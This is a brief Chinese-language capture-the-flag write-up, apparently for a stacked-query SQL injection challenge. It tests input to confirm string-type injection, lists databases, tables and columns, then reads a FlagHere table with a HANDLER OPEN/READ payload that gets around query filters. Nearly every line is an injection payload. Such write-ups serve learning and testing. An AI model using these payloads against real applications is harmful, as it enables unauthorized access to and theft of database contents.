打开题目
判断注入类型,输入1试试
输入2
输入1'
判断为字符型注入
堆叠查询2';show databases;#
然后来输入2'; show tables;#来查看数据库的表
然后我们通过FlagHere表来查看列输入2';show columns from FlagHere;# 来查看列
、
重新构造payload:0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#得到flag